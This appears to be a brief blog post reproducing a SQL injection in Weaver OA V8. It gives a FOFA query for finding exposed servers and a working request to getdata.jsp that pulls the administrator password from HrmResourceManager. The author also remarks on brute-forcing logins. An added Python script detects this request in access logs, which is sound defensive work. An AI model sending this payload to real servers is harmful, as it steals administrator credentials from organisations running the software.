vlambda Blog

Weaver OA V8 SQL Injection Vulnerability Reproduction (2021 HW)

FOFA search: app="Weaver-OA"


/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select password as id from HrmResourceManager
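
From the defender's side, the request above leaves a recognisable trace in web access logs. The following Python is an added example, not part of the original post: it scans combined-format log lines for requests to getdata.jsp that carry cmd=getSelectAllId together with a sql parameter. The log lines, the log format and the function name find_getdata_sql_requests are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and cmd value taken from the request shown in the post.
TARGET_PATH = "/js/hrm/getdata.jsp"
TARGET_CMD = "getselectallid"

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Apr/2021:09:12:01 +0800] "GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1" 200 45
192.0.2.11 - - [10/Apr/2021:09:12:05 +0800] "GET /index.html HTTP/1.1" 200 5120
192.0.2.10 - - [10/Apr/2021:09:13:40 +0800] "GET /JS/hrm/GetData.jsp?CMD=getselectallid&SQL=select+password+as+id+from+HrmResourceManager HTTP/1.1" 200 12
192.0.2.12 - - [10/Apr/2021:09:14:02 +0800] "GET /js/hrm/getdata.jsp?cmd=getSelectAllId HTTP/1.1" 200 0
"""

# client, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def find_getdata_sql_requests(log_text):
    """Return one dict per request that passes a sql= value to getdata.jsp."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, when, _method, target, status = m.groups()
        url = urlsplit(target)
        # Drop ";..." path parameters, decode %xx and fold case before comparing.
        path = unquote(url.path.split(";")[0]).lower()
        if path != TARGET_PATH:
            continue
        # parse_qs URL-decodes values; parameter names are folded to lower case
        # so that case variants are still flagged.
        params = {k.lower(): v[0] for k, v in parse_qs(url.query).items()}
        if params.get("cmd", "").lower() != TARGET_CMD or "sql" not in params:
            continue
        hits.append({"client": client, "time": when,
                     "status": int(status), "sql": params["sql"]})
    return hits


if __name__ == "__main__":
    for hit in find_getdata_sql_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so parameters sent in a request body would need WAF or application-level logging to be seen.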


A screenshot I found online, hahaha. No wonder I couldn't guess the username:


Then query loginid: (I didn't expect that.... if I had known, I would have brute-forced it)



References:

https://mp.weixin.qq.com/s/3tuDJyUWKS8yiLRsfvn2WQ


